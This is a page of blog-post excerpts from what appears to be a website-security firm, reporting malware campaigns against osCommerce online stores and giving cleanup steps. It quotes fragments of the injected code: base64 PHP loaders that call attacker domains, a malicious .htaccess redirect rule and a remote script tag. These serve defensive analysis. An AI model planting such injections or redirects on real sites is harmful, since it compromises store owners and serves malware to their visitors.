Search Results for: oscommerce

Non-Stop Attacks Against osCommerce – Time to Take Action

The malware attacks against osCommerce sites are still going at full force and the site owners have to take action to secure and update their sites as soon as possible. Think about that, with so many valuable targets (online stores) that are not updated and secured, why would they stop attacking now?


*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it to check if it’s clean: Sucuri SiteCheck



Read More

Attacks against osCommerce sites – Spam / google_analytics_obh

It seems that the attacks against osCommerce are not going to stop any time soon. With so many valuable targets (online stores) that are not updated and secured, why would they?


*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it here to check if it’s clean: Sucuri SiteCheck


After all the latest osCommerce malware (div_colors, nt07.in, CreateCSS, willysy.com, etc), we’re seeing an old attack reemerging in full force, and compromising thousands of sites.

The attack is the “__google_analytics_obh” that add hidden links (for Blackhat SEO spam) to the sites. It has been happening for a while, but for the last few days, it just grew in mass scale.

This is what shows up on a compromised site:

Read More

osCommerce malware: Cannot redeclare corelibrarieshandler

We have been posting for a while about attacks targeting and infecting thousands of osCommerce sites (CreateCSS, div_colors, etc) and the importance of keeping it updated and secure.

If you think things have been improving, just for the last few days we started to see many of those osCommerce sites that were hacked, generating errors when trying to access them:

Read More

Continuing attacks against osCommerce: khcol.com

Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to http://khcol.com. This is how it looks like in an infected site:

<script type="text/javascript">document.location = "http://khcol.com/page/?ref=aHR0cDovL2FtZXJ…..tL2FkbWluLw=="

This javascript is generated by the following code added to the bottom of all PHP files in the server:

<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode(‘a2hjb2wuY29t’);$tf['u']=’http://’.$tf['s']…


Read More

osCommerce attacks and nt07.in, nt06.in, etc

We posted yesterday about a series of attacks against osCommerce sites using some russian domains to push the malware (generally the fake AV). We also posted details on how to fix and secure osCommerce to protect against those:

http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – veriandjsad@comcast.net) that are infecting thousands of sites too.

When they detect an vulnerable site (see previous post by details on that), they drop a backdoor, generally named google*.php that will allow them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):

http://sucuri.net/?page=tools&title=blacklist&detail=1205dd32a1004a65ecc4d4441474217d

It is interesting that in addition to give full shell access to the attackers, it also uses http://redserver.com.ua/code.txt to read the list of domains to use in the attack. Currently, these are the ones being used:

Read More

Continuing attacks against osCommerce sites

We are seeing an increase in the number of osCommerce sites hacked lately, and we recommend anyone using it to take precautions to avoid getting hacked and/or reinfected.

On most of the sites we’ve analyzed so far, the attackers used the file_manager.php vulnerability to hack the site.

If you’re using osCommerce, the first thing you have to do is to install the latest version. Second, remove the file_manager.php file and then rename your admin directory to something else: login via FTP or SSH(recommended) to do so

ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php

Once you do that, modify your configure.php to point the admin folder to the new location.

Read More

Malware update: inininininininin.in (and oscommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by inininininininin.in, comcomcomcomcomcom.com and a few others. All the domains involved are hosted at 91.204.48.45.

These domains were registered by myid37@gmail.com, which is also involved on other malicious activities (serials-keys.com, wincrack.org, search-crack.org,etc).

The infected sites had a large encoded entry added to the file includes/header.php:

echo(base64_decode(“ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD…

Which when decoded, calls http://inininininininin.in/in.php to get what malware to present to the end user:

Read More

osCommerce attacks – kirm-sky.ru

We are seeing a very large number of osCommerce sites hacked on the last few days. If you are an osCommerce user, make sure to update it asap and check if to see if it’s been infected (also remove the file_manager.php from the admin directory).

These attacks seems to be using the same vulnerability used in previous attacks (nt02.co.in, nt04.in, etc).

The latest version consists of the following:

1 .htaccess is modified to redirect users to kirm-sky.ru, voice-nano.ru, devisionnetwork.ru, etc (just the first domain infected more than 600 sites according to Google).

This is what the .htaccess looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]

2 A backdoor is created inside /js/conf.php and another one at /flops.php. Make sure to remove these and search for other PHP files that are not part of the official osCommerce distribution.

3 Blackhat SEO SPAM is added to includes/application_bottom.php.


All the domains used in this attack are hosted at 91.204.48.37:

kirm-ar.ru
kirmar.ru
classwoods.ru
enterteiment-wizrd.ru
class-woods.ru
relax-july.ru
ar-kirm.ru
enterteimentwizrd.ru
tecros.ru
tutaanti.ru
kirm-sky.ru
sky-ar.ru
devisionnetwork.ru
voice-nano.ru

This is how our malware scanner detects an infected site:

OsCommerce hacked

OsCommerce hacked

We will post more details as we learn more about it. This link gives some good tips on how to secure osCommerce.


If your site is hacked and you need help, contact us a support@sucuri.net or http://sucuri.net

osCommerce users, update your installations as soon as possible

If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible. We have been tracking multiple compromises of osCommerce installations where the attackers added this javascript malware to the affected sites:

< script src = “http://nt02.co.in/3″ >

This code is used to load malware to unsuspecting visitors of your site. Most of the sites affected also had a few PHP files inserted inside the /images folder, generally called inclasses.php, loadclasses.php or phpclasses.php.

We are still researching how those sites got hacked and which vulnerability was used. It could be this one, or some of the others recently published.

If you have more information let us know.

PHP Backdoors: Hidden With Clever Use of Extract Function

When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back to the site; this type of malware is called a backdoor. This type of malware was named this because it allows for remote control of a compromised website in a way that bypasses appropriate authentication methods. You can update your site, change passwords, along with any of your admin procedures, and the backdoor would still be there allowing unexpected access to an attacker.

Backdoors are also very hard to find because they don’t have to be linked in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere on your site, file system or database.

We have written extensively about website backdoors (generally in PHP) that allow for continuous reinfections and control of hacked websites.

You can read something more about backdoors on these links:


Read More